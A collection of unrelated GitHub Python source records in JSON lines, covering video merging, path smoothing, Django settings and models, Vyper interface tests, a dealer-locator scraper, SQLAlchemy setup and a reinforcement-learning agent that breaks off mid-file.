+{"seq_id":"28893135899","text":"import cv2\nimport argparse\nimport numpy as np\n\ndef adjacent_video(videoPath1, videoPath2, outputPath):\n \"\"\"\n Name: adjacent_video\n Input: path to left video, path to right video, path to output\n Return: none\n What it does: puts left and right video sidebyside\n \"\"\"\n # read existing video in folder\n cap = cv2.VideoCapture(videoPath1)\n cap2 = cv2.VideoCapture(videoPath2)\n\n # output file\n fourcc = 0x00000021\n out = cv2.VideoWriter(outputPath, fourcc, 20.0, (1280,480))\n\n while(True):\n ret, frame = cap.read()\n ret2, frame2 = cap2.read()\n if not ret and not ret2:\n break;\n if ret:\n lframe = frame\n if ret:\n lframe2 = frame2\n #merge images side by side \n combined_frame = np.concatenate([lframe, lframe2], axis = 1)\n out.write(combined_frame)\n\n cap.release()\n cap2.release()\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"inputPath\", help = \"path to video with *'XVID' codec\")\n parser.add_argument(\"inputPath2\", help = \"path to video with *'XVID' codec\")\n parser.add_argument(\"outputPath\", help = \"path to output video with faces and eyes detected\")\n args = parser.parse_args()\n adjacent_video(args.inputPath, args.inputPath2, args.outputPath)\n","repo_name":"tuftsceeo/EDL2020","sub_path":"student_notebook_root_folder/archive/image_processing/python_scripts/adjacent_video.py","file_name":"adjacent_video.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"43056671752","text":"import math\n\n# Calculate the perpendicular distance from a point to a line segment\ndef point_to_line_distance(point, start, end):\n line_length = math.dist(start, end)\n if line_length == 0:\n return math.dist(point, start)\n \n t = ((point[0] - start[0]) * (end[0] - start[0]) + (point[1] - start[1]) * (end[1] - start[1])) / (line_length ** 2)\n t = max(0, min(1, t))\n \n projection = (start[0] + t * (end[0] - start[0]), start[1] + t * (end[1] - start[1]))\n return math.dist(point, projection)\n\n# Recursive Douglas-Peucker simplification\ndef douglas_peucker_simplify(path, epsilon):\n dmax = 0\n index = 0\n \n for i in range(1, len(path) - 1):\n d = point_to_line_distance(path[i], path[0], path[-1])\n if d > dmax:\n index = i\n dmax = d\n \n if dmax > epsilon:\n recursive_result1 = douglas_peucker_simplify(path[:index + 1], epsilon)\n recursive_result2 = douglas_peucker_simplify(path[index:], epsilon)\n simplified_path = recursive_result1[:-1] + recursive_result2\n else:\n simplified_path = [path[0], path[-1]]\n \n return simplified_path\n\n\ndef smooth_path(path):\n \n if len(path) <= 2:\n return path # path already smoothed\n\n smoothed_path = path\n # current_dir = [path[1][0] - path[0][0], path[1][1] - path[0][1]]\n # smoothed_path = [path[0]]\n # for i in range(2, len(path)):\n # if [path[i][0] - path[i-1][0], path[i][1] - path[i-1][1]] != current_dir:\n # smoothed_path.append(path[i-1])\n # current_dir = [path[i][0] - path[i-1][0], path[i][1] - path[i-1][1]]\n # smoothed_path.append(path[-1])\n\n\n smoothed_path = douglas_peucker_simplify(smoothed_path, epsilon=1)\n\n return smoothed_path\n","repo_name":"jjah0001/ECE4191G11","sub_path":"SCR/path_planning_search_based/path_smoothing.py","file_name":"path_smoothing.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"40739193803","text":"\"\"\"\nDjango settings for project.\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os.path\n\n# Debug\n#DEBUG = False\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nADMINS = (\n ('', ''),\n)\nMANAGERS = ADMINS\n\nSECRET_KEY = ''\nALLOWED_HOSTS = []\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'America/Chicago'\nSITE_ID = 1\nUSE_I18N = False\nUSE_L10N = False\nUSE_TZ = False\nDEFAULT_CHARSET = 'utf-8'\nFILE_CHARSET = 'utf-8'\n\nSERVER_URL = \"\"\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nROOT_DIR = os.path.dirname(__file__)\nROOT_URL = \"/djskeletor/\"\nROOT_URLCONF = 'djskeletor.urls'\nWSGI_APPLICATION = 'djskeletor.wsgi.application'\nMEDIA_ROOT = ''\nADMIN_MEDIA_PREFIX = '/static/admin/'\nSTATIC_ROOT = ''\nSTATIC_URL = \"/static/\"\nSTATICFILES_DIRS = ()\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nDATABASES = {\n 'default': {\n 'HOST': '127.0.0.1',\n 'PORT': '3306',\n 'NAME': 'djskeletor',\n 'ENGINE': 'django.db.backends.mysql',\n 'USER': '',\n 'PASSWORD': ''\n },\n}\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.humanize',\n 'django.contrib.messages',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'djskeletor',\n 'djskeletor.core',\n 'djskeletor.myapp',\n 'djtools',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n# template stuff\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(os.path.dirname(__file__), 'templates'),\n \"/data2/django_templates/djkorra/\",\n \"/data2/django_templates/djcher/\",\n \"/data2/django_templates/\",\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n \"djtools.context_processors.sitevars\",\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.core.context_processors.request',\n 'django.template.context_processors.static',\n 'django.contrib.messages.context_processors.messages',\n ],\n #'loaders': [\n # # insert your TEMPLATE_LOADERS here\n #]\n },\n },\n]\n# caching\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.dummy.DummyCache',\n #'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n #'LOCATION': '127.0.0.1:11211',\n #'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',\n #'LOCATION': '/var/tmp/django_directory_cache',\n #'TIMEOUT': 60*20,\n #'KEY_PREFIX': \"DIRECTORY_\",\n #'OPTIONS': {\n # 'MAX_ENTRIES': 80000,\n #}\n }\n}\nCACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\n\n# LDAP Constants\nLDAP_SERVER = ''\nLDAP_PORT = '636'\nLDAP_PROTOCOL = \"ldaps\"\nLDAP_BASE = \"\"\nLDAP_USER = \"\"\nLDAP_PASS = \"\"\nLDAP_EMAIL_DOMAIN = \"\"\n# auth backends\nAUTHENTICATION_BACKENDS = (\n 'djauth.ldapBackend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n)\nLOGIN_URL = '/djskeletor/accounts/login/'\nLOGIN_REDIRECT_URL = '/djskeletor/'\nUSE_X_FORWARDED_HOST = True\n#SESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\nSESSION_EXPIRE_AT_BROWSER_CLOSE = False\nSESSION_COOKIE_DOMAIN=\".carthage.edu\"\nSESSION_COOKIE_NAME ='django_carthage_cookie'\nSESSION_COOKIE_AGE = 86400\n\n# logging\nLOG_FILEPATH = os.path.join(os.path.dirname(__file__), \"logs/\")\nLOG_FILENAME = LOG_FILEPATH + \"debug.log\"\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'standard': {\n 'format' : \"[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\",\n 'datefmt' : \"%Y/%b/%d %H:%M:%S\"\n },\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',\n 'datefmt' : \"%Y/%b/%d %H:%M:%S\"\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'logfile': {\n 'level':'DEBUG',\n 'class':'logging.handlers.RotatingFileHandler',\n 'filename': LOG_FILENAME,\n 'maxBytes': 50000,\n 'backupCount': 2,\n 'formatter': 'standard',\n },\n 'console':{\n 'level':'INFO',\n 'class':'logging.StreamHandler',\n 'formatter': 'standard'\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'mugshots.upload': {\n 'handlers':['logfile'],\n 'propagate': True,\n 'level':'DEBUG',\n },\n 'core': {\n 'handlers':['logfile'],\n 'propagate': True,\n 'level':'DEBUG',\n },\n 'django': {\n 'handlers':['console'],\n 'propagate': True,\n 'level':'WARN',\n },\n 'django.db.backends': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","repo_name":"carthage-college/django_1.11.x-djparking","sub_path":"djparking/settings_default.py","file_name":"settings_default.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37721363356","text":"import typing\n\nclass DispatchRepr:\n def __repr__(self) -> str:\n _repr = f\"\"\"\n Dispatch(\\n\n vals={self._vals},\n children={self._children}\n )\n \"\"\"\n return _repr\n\nclass a_HrefRepr:\n def __repr__(self) -> str:\n _repr = f\"\"\"\n A_Href(\n href={self.tree.tree_attrs[\"href\"]},\n content={self.struct}\n\n )\n \"\"\"\n return _repr\n\nclass ImgRepr:\n def __repr__(self) -> str:\n _repr = f\"\"\"\n Img(\n src={self.tree.tree_attrs[\"src\"]},\n content={self.struct}\n\n )\n \"\"\"\n return _repr\n\nclass StructuredRecordRepr:\n def __repr__(self) -> str:\n _repr = \"\"\"\n StructuredRecord(\n records = {},\n content = {}\n )\n \"\"\".format(\",\\n\".join(map(repr, self.records)), self.struct)\n return _repr\n\nclass MatchedRunRepr:\n def __repr__(self) -> str:\n _repr = \"\"\"\n MatchedRun(\n runs = {},\n \n )\n \"\"\".format(\",\\n\".join(map(repr, self.run_objs)))\n return _repr\n\nclass PatternMatcherRepr:\n def __repr__(self) -> str:\n _repr = \"\"\"\n PatternMatcher(\n runs = {},\n struct = {}\n )\n \"\"\".format(\",\\n\".join(map(repr, self.runs)), self.struct)\n return _repr\n \n\n","repo_name":"Ajax12345/scrapio","sub_path":"scrapio/parsed_reprs.py","file_name":"parsed_reprs.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"11029728130","text":"from django.db import models\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext as _\nfrom django.contrib.auth.models import User\nfrom model_utils import Choices\n# Create your models here.\n\n\nclass Akcesoria(models.Model):\n\n CO_CHOICES = Choices(\n ('plecki', _('Plecki')),\n ('book', _('Książka')),\n ('szklo', _('Szkło')),\n ('folia', _('Folia')),\n ('inne', _('Inne')),\n )\n\n data = models.DateField(auto_now_add=True)\n kto = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, default=User)\n co = models.CharField(max_length=15, choices=CO_CHOICES, default=CO_CHOICES.plecki)\n kwota = models.DecimalField(max_digits=5, decimal_places=2)\n model = models.CharField(max_length=128, null=True, blank=True)\n\n def __str__(self):\n return self.co\n\n def get_absolute_url(self):\n return reverse(\"dashboard:dashboard-home\")\n","repo_name":"kmoskal/playbb","sub_path":"akcesoria/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"35642687440","text":"# Raikage The Third\n\nfrom django.urls import path\n\nfrom .views import *\n\nurlpatterns =[\n path('', homepage, name='home'),\n path('demande-de-devis/', DevisPageView.as_view(), name='devis'),\n path('marketing/', marketing, name='marketing'),\n path('mobile-app/', mobile, name='mobileapp'),\n path('software-development/', softwares, name='softwaredev'),\n path('website-development/', website, name='websitedev'),\n\n]","repo_name":"LeonardoRubuz/startech","sub_path":"visiteurs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"26590732465","text":"#8. Faça um Programa que peça a idade e a altura de 5 pessoas, armazene cada informação no seu respectivo vetor.\n# Imprima a idade e a altura na ordem inversa a ordem lida.\nlistaIdades = []\nlistaAlturas = []\nfor i in range(1,6):\n idade = int(input(f'Informe a idade da pessoa {i}/5: '))\n altura = float(input(f'Informe a altura da pessoa {i}/5: '))\n listaIdades.append(idade)\n listaAlturas.append(altura)\nlistaAlturas.reverse()\nlistaIdades.reverse()\nprint(listaIdades)\nprint(listaAlturas)\n","repo_name":"MdotSouza/WikiPython","sub_path":"04ExerciciosListas/l4ex8.py","file_name":"l4ex8.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"27606105307","text":"# coding: utf-8\n\nfrom apis.commons.apis_commons import Apis\n\n\nclass ApisUtils(Apis):\n\n def __init__(self):\n super(ApisUtils, self).__init__()\n\n def get_user_message(self):\n \"\"\"\n 获取用户通知\n \"\"\"\n filter_params = '{\"logic\":\"and\",\"filters\":[{\"field\":\"isDeleted\",\"operator\":\"eq\",\"value\":False},' \\\n '{\"field\":\"userId\",\"operator\":\"eq\",\"value\":\"39fe8e4c-5292-d5da-a219-caa9fafa3913\"}]}'\n\n params = {\n \"skipCount\": 0,\n \"sorting\": \"creationTime desc\",\n \"filter\": filter_params\n }","repo_name":"zj1995-09-09/supercare_api_test","sub_path":"testcase/commons/commons_steps.py","file_name":"commons_steps.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"22557292671","text":"import unittest\n\"\"\"\nTests for stop finder, stop getter, and route selector\n\"\"\"\n\nclass test(unittest.TestCase):\n \n\n def test_model_coverage(self):\n \"\"\"\n Tests that there are models for every stop link\n So we have all of the models\n \"\"\"\n print('testing model coverage')\n \n import os\n import json\n fails=0\n total = 0\n routes = json.loads(open('/home/student/db/resources/trimmed_routes.json','r').read())\n route = routes['15']\n \n \n for route in routes:\n for v_num,v in enumerate(routes[route]):\n failed_on_variation = False\n for i in range(1, len(v) -1 ):\n total += 1\n if not os.path.exists('/data/neural_models3/'+str(v[i])+'_'+str(v[i+1])+'.bin'):\n fails+=1\n failed_on_variation = True\n\n if failed_on_variation:\n print(route,v_num)\n f=open('failed_routes_log.log','a')\n f.write(str(route)+'_'+str(v_num)+'\\n')\n f.close()\n\n print(total,fails)\n input()\n self.assertEqual(fails==0,True) \n\n def test_build_network(self):\n \"\"\"\n Tests that the network object can be built from scratch. Takes forever.\n \"\"\"\n\n from dbanalysis.network import simple_network4\n import pickle\n import time\n t1 = time.time()\n n = simple_network4.simple_network()\n\n n.prepare_dijkstra()\n n.properly_add_foot_links()\n n.generate_time_tables()\n for node in n.nodes:\n\n n.nodes[node].timetable.concat_and_sort()\n with open('/data/done2.bin','wb') as handle:\n pickle.dump(n,handle,protocol=pickle.HIGHEST_PROTOCOL)\n for node in n.nodes:\n print(node)\n self.assertEqual(len(n.nodes[node].timetable.data) > 0, True)\n del(n)\n end_time = time.time() - t1\n import datetime\n dt = datetime.datetime.now()\n f=open('report.txt','a')\n f.write('*******Test report for ' + str(dt) + '*******\\n')\n f.write('Network object constructed and all timetables generated in ' + str(end_time) + 'seconds\\n')\n f.close()\ndef main():\n unittest.main()\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"Manjunathsk92/dbanalysis","sub_path":"dbanalysis/tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"19079867853","text":"import os\n\nimport numpy as np\n\n\ndef triangle_subdivision(n_div):\n faces = []\n for i in range(1, n_div + 1)[::-1]:\n for j in range(n_div + 1 - i):\n k = n_div - i - j\n f = [(i, j, k), (i - 1, j + 1, k), (i - 1, j, k + 1)]\n faces.append(f)\n for i in range(1, n_div + 1)[::-1]:\n for j in range(1, n_div + 1 - i):\n k = n_div - i - j\n f = [(i, j, k), (i - 1, j, k + 1), (i, j - 1, k + 1)]\n faces.append(f)\n return faces\n\n\ndef subdivide_edges(coords, faces, n_div):\n n_edges = faces.shape[0] * 3 // 2\n nv_new = n_edges * (n_div - 1)\n new_coords = np.zeros((nv_new, 3), dtype=coords.dtype)\n\n nv = coords.shape[0]\n count = 0\n edges = set()\n e_mapping = {}\n for f in faces:\n for a, b in [[f[0], f[1]], [f[0], f[2]], [f[1], f[2]]]:\n e = (a, b) if a < b else (b, a)\n if e in edges:\n continue\n edges.add(e)\n for i in range(1, n_div):\n c = (coords[a] * i + coords[b] * (n_div - i)) / n_div\n # c /= np.linalg.norm(c)\n # new_coords.append(c)\n new_coords[count] = c\n e_mapping[(e[0], e[1], i)] = count + nv\n count += 1\n\n return new_coords, e_mapping\n\n\ndef subdivide_inside(coords, faces, e_mapping, n_div, count_base):\n # new_coords, new_faces = [], []\n nv_new = (n_div - 1) * (n_div - 2) // 2 * len(faces)\n new_coords = np.zeros((nv_new, 3), dtype=coords.dtype)\n count = 0\n new_faces = []\n nf_base = triangle_subdivision(n_div)\n\n for f in faces:\n mapping = {\n (n_div, 0, 0): f[0],\n (0, n_div, 0): f[1],\n (0, 0, n_div): f[2],\n }\n\n for ii, jj in [[0, 1], [0, 2], [1, 2]]:\n a, b = f[[ii, jj]]\n aa, bb = (a, b) if a < b else (b, a)\n for step in range(1, n_div):\n val = e_mapping[aa, bb, step]\n key = [0, 0, 0]\n key[ii] = step\n key[jj] = n_div - step\n mapping[tuple(key)] = val\n\n for i in range(n_div)[::-1]:\n for j in range(n_div + 1 - i):\n k = n_div - i - j\n if (i, j, k) not in mapping:\n mapping[(i, j, k)] = count + count_base\n c = np.sum(\n coords[f] * (np.array([i, j, k])[:, np.newaxis] / n_div), axis=0\n )\n # c /= np.linalg.norm(c)\n # new_coords.append(c)\n new_coords[count] = c\n count += 1\n\n nf = [[mapping[v] for v in f] for f in nf_base]\n new_faces += nf\n\n # new_coords = np.array(new_coords)\n new_faces = np.array(new_faces)\n return new_coords, new_faces\n\n\ndef surface_subdivision(coords, faces, n_div):\n edge_coords, e_mapping = subdivide_edges(coords, faces, n_div)\n count = coords.shape[0] + edge_coords.shape[0]\n inside_coords, new_faces = subdivide_inside(coords, faces, e_mapping, n_div, count)\n print(coords.shape, edge_coords.shape, inside_coords.shape)\n new_coords = np.concatenate([coords, edge_coords, inside_coords], axis=0)\n return new_coords, new_faces\n\n\n# new_coords, new_faces = [], []\n\n# # count = coords.shape[0]\n\n# new_coords_edges, e_mapping = subdivide_edges(coords, faces, n_div)\n\n\n# new_coords = np.array(new_coords)\n# new_faces = np.array(new_faces)\n# coords = np.concatenate([coords, new_coords], axis=0)\n\n# return coords, new_faces\n","repo_name":"neuroboros/neuroboros","sub_path":"src/neuroboros/surface/subdivision.py","file_name":"subdivision.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"24763824353","text":"from vyper.compiler import (\n compile_code,\n compile_codes,\n)\nfrom vyper.exceptions import (\n StructureException,\n)\nfrom vyper.interfaces import (\n ERC20,\n ERC721,\n)\nfrom vyper.signatures.interface import (\n extract_file_interface_imports,\n extract_sigs,\n)\n\n\ndef test_basic_extract_interface():\n code = \"\"\"\n# Events\n\nTransfer: event({_from: address, _to: address, _value: uint256})\n\n# Functions\n\n@constant\n@public\ndef allowance(_owner: address, _spender: address) -> (uint256, uint256):\n return 1, 2\n \"\"\"\n\n out = compile_code(code, ['interface'])\n out = out['interface']\n code_pass = '\\n'.join(code.split('\\n')[:-2] + [' pass']) # replace with a pass statement.\n\n assert code_pass.strip() == out.strip()\n\n\ndef test_basic_extract_external_interface():\n code = \"\"\"\n@constant\n@public\ndef allowance(_owner: address, _spender: address) -> (uint256, uint256):\n return 1, 2\n\n@public\ndef test(_owner: address):\n pass\n\n@constant\n@private\ndef _prive(_owner: address, _spender: address) -> (uint256, uint256):\n return 1, 2\n \"\"\"\n\n interface = \"\"\"\n# External Contracts\ncontract One:\n def allowance(_owner: address, _spender: address) -> (uint256, uint256): constant\n def test(_owner: address): modifying\n \"\"\"\n\n out = compile_codes({'one.vy': code}, ['external_interface'])[0]\n out = out['external_interface']\n\n assert interface.strip() == out.strip()\n\n\ndef test_basic_interface_implements(assert_compile_failed):\n code = \"\"\"\nfrom vyper.interfaces import ERC20\n\nimplements: ERC20\n\n\n@public\ndef test() -> bool:\n return True\n \"\"\"\n\n assert_compile_failed(\n lambda: compile_codes({'one.vy': code}),\n StructureException\n )\n\n\ndef test_builtin_interfaces_parse():\n assert len(extract_sigs({'type': 'vyper', 'code': ERC20.interface_code})) == 8\n assert len(extract_sigs({'type': 'vyper', 'code': ERC721.interface_code})) == 13\n\n\ndef test_external_interface_parsing(assert_compile_failed):\n interface_code = \"\"\"\n@public\ndef foo() -> uint256:\n pass\n\n@public\ndef bar() -> uint256:\n pass\n \"\"\"\n\n interface_codes = {\n 'FooBarInterface': {\n 'type': 'vyper',\n 'code': interface_code\n }\n }\n\n code = \"\"\"\nimport a as FooBarInterface\n\nimplements: FooBarInterface\n\n@public\ndef foo() -> uint256:\n return 1\n\n@public\ndef bar() -> uint256:\n return 2\n \"\"\"\n\n assert compile_codes({'one.vy': code}, interface_codes=interface_codes)[0]\n\n not_implemented_code = \"\"\"\nimport a as FooBarInterface\n\nimplements: FooBarInterface\n\n@public\ndef foo() -> uint256:\n return 1\n\n \"\"\"\n\n assert_compile_failed(\n lambda: compile_codes({'one.vy': not_implemented_code}, interface_codes=interface_codes)[0],\n StructureException\n )\n\n\ndef test_extract_file_interface_imports(assert_compile_failed):\n code = \"\"\"\nimport a as FooBarInterface\n \"\"\"\n\n assert extract_file_interface_imports(code) == {'FooBarInterface': 'a'}\n\n invalid_no_alias_code = \"\"\"\nimport a\n \"\"\"\n assert_compile_failed(\n lambda: extract_file_interface_imports(invalid_no_alias_code), StructureException\n )\n\n invalid_interfac_already_exists_code = \"\"\"\nimport a as A\nimport a as A\n \"\"\"\n assert_compile_failed(lambda: extract_file_interface_imports(invalid_interfac_already_exists_code), StructureException) # noqa: E501\n\n\ndef test_external_call_to_interface(w3, get_contract):\n token_code = \"\"\"\nbalanceOf: public(map(address, uint256))\n\n@public\ndef transfer(to: address, value: uint256):\n self.balanceOf[to] += value\n \"\"\"\n\n code = \"\"\"\nimport one as TokenCode\n\ncontract EPI:\n def test() -> uint256: constant\n\n\ntoken_address: TokenCode\n\n\n@public\ndef __init__(_token_address: address):\n self.token_address = TokenCode(_token_address)\n\n\n@public\ndef test():\n self.token_address.transfer(msg.sender, 1000)\n \"\"\"\n\n erc20 = get_contract(token_code)\n test_c = get_contract(code, *[erc20.address], interface_codes={\n 'TokenCode': {'type': 'vyper', 'code': token_code}\n })\n\n sender = w3.eth.accounts[0]\n assert erc20.balanceOf(sender) == 0\n\n test_c.test(transact={})\n assert erc20.balanceOf(sender) == 1000\n\n\ndef test_external_call_to_builtin_interface(w3, get_contract):\n token_code = \"\"\"\nbalanceOf: public(map(address, uint256))\n\n@public\ndef transfer(to: address, value: uint256):\n self.balanceOf[to] += value\n \"\"\"\n\n code = \"\"\"\nfrom vyper.interfaces import ERC20\n\n\ntoken_address: ERC20\n\n\n@public\ndef __init__(_token_address: address):\n self.token_address = ERC20(_token_address)\n\n\n@public\ndef test():\n self.token_address.transfer(msg.sender, 1000)\n \"\"\"\n\n erc20 = get_contract(token_code)\n test_c = get_contract(code, *[erc20.address], interface_codes={\n 'TokenCode': {\n 'type': 'vyper',\n 'code': token_code\n }\n })\n\n sender = w3.eth.accounts[0]\n assert erc20.balanceOf(sender) == 0\n\n test_c.test(transact={})\n assert erc20.balanceOf(sender) == 1000\n\n\ndef test_json_interface(get_contract):\n code = \"\"\"\nimport folding as Folding\n\nimplements: Folding\n\n@public\ndef test(a: uint256) -> uint256:\n return 1 + a\n\n\n@public\ndef test2(a: uint256):\n pass\n \"\"\"\n\n interface_codes = {\n 'Folding': {\n 'type': 'json',\n 'code': [\n {\n \"name\": \"test\",\n \"outputs\": [{\n \"type\": \"uint256\",\n \"name\": \"out\"\n }],\n \"inputs\": [{\n \"type\": \"uint256\",\n \"name\": \"s\"\n }],\n \"constant\": False,\n \"payable\": False,\n \"type\": \"function\",\n },\n {\n \"name\": \"test2\",\n \"outputs\": [],\n \"inputs\": [{\n \"type\": \"uint256\",\n \"name\": \"s\"\n }],\n \"constant\": False,\n \"payable\": False,\n \"type\": \"function\",\n }\n ]\n }\n }\n\n c = get_contract(code, interface_codes=interface_codes)\n\n assert c.test(2) == 3\n\n\ndef test_units_interface(w3, get_contract):\n code = \"\"\"\nimport balanceof as BalanceOf\n\nimplements: BalanceOf\n\n@public\n@constant\ndef balanceOf(owner: address) -> wei_value:\n return as_wei_value(1, \"ether\")\n \"\"\"\n interface_code = \"\"\"\n@public\n@constant\ndef balanceOf(owner: address) -> uint256:\n pass\n \"\"\"\n interface_codes = {\n \"BalanceOf\": {\n 'type': 'vyper',\n 'code': interface_code\n }\n }\n c = get_contract(code, interface_codes=interface_codes)\n\n assert c.balanceOf(w3.eth.accounts[0]) == w3.toWei(1, \"ether\")\n","repo_name":"ssteiger/Vyper-Contract-GUI-Depreciated","sub_path":"vyper/tests/parser/functions/test_interfaces.py","file_name":"test_interfaces.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"21663292742","text":"# -*- coding: utf-8 -*-\n\nclass Wrapper:\n def __init__(self):\n self.data = [\n {'city': 'Marseilles'},\n {'city': 'Paris'}, \n {'city': 'Lyon'}, \n ]\n self.website = 'https://www.mazda.fr/forms-v2/dealer-locatorfrance/'\n self.category = 'car dealer'\n self.http_method = 'POST'\n self.response_format = 'JSON'\n self.notes = 'Uses JSON for payload'\n\n def run(self, browser, inputs):\n browser.get(self.website)\n browser.wait_load('input[name=\"bylocation\"]')#div.main-search')\n browser.keys('input[name=\"bylocation\"]', inputs['city'] + '', False)#True)\n browser.click('div.main-search > button', True)\n browser.wait_load('div.dealer-name a')\n return {\n 'name': [e.partition('. ')[-1] for e in browser.text('div.dealer-name a')],\n 'address': browser.text('li[ng-if=\"address.FirstLine\"]'),\n 'city': browser.text('li[ng-if=\"address.TownCity\"]'),\n 'postcode': browser.text('li[ng-if=\"address.PostCode\"]'),\n }\n","repo_name":"richardpenman/minwrap","sub_path":"wrappers/mazda.py","file_name":"mazda.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"20672358613","text":"from sqlalchemy import create_engine, MetaData, Table, Integer, Column, JSON, Text, DateTime\nfrom sqlalchemy.engine import Engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, Session\n\nBase = declarative_base()\n\n\ndef connect(db_URI: str) -> Session:\n database_URI = db_URI\n created_engine = create_engine(database_URI, echo=True)\n session = sessionmaker(bind=created_engine, )\n session = session()\n _create_table_if_needed('news_article', created_engine)\n return session\n\n\ndef _create_table_if_needed(table_name: str, created_engine: Engine) -> None:\n metadata = MetaData()\n new_table = Table(table_name, metadata,\n Column('id', Integer, primary_key=True),\n Column('author', JSON),\n Column('body', Text),\n Column('categories', JSON),\n Column('characters_count', Integer),\n Column('entities', JSON),\n Column('hashtags', Text),\n Column('keywords', Text),\n Column('language', Text),\n Column('links', JSON),\n Column('media', JSON),\n Column('paragraphs_count', Integer),\n Column('published_at', DateTime),\n Column('sentences_count', Integer),\n Column('sentiment', JSON),\n Column('social_shares_count', JSON),\n Column('source', JSON),\n Column('summary', JSON),\n Column('title', Text),\n Column('words_count', Integer),\n mysql_charset='latin1')\n metadata.create_all(created_engine, tables=[new_table], checkfirst=True)\n","repo_name":"venomouscyanide/SQL-Alchemy-JSON-Import","sub_path":"connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"13495422478","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Categorical\n\nfrom common import obesrvation_shape, device, Agent\nfrom utils import get_cumulative_rewards, generate_session, generate_session_batch, get_total_rewards\n\n\ndef reinforce_loss(logprobas, actions, rewards):\n # select log-probabilities for chosen actions, log pi(a_i|s_i)\n logprobas_for_actions = torch.sum(logprobas * to_one_hot(actions).to(torch.float), dim=1)\n return torch.mean(-logprobas_for_actions * rewards)\n\n\nclass ActorCritic(Agent):\n def __init__(self, observation_space, action_space, args):\n self.model = MLPPolicy(observation_space, action_space).to(device)\n self.optimizer = torch.optim.Adam(self.model.parameters(), args.lr)\n self.gamma = args.gamma\n self.value_loss_coef = args.value_loss_coef\n self.entropy_coef = args.entropy_coef\n\n def save(self, path):\n torch.save({\n 'state_dict': 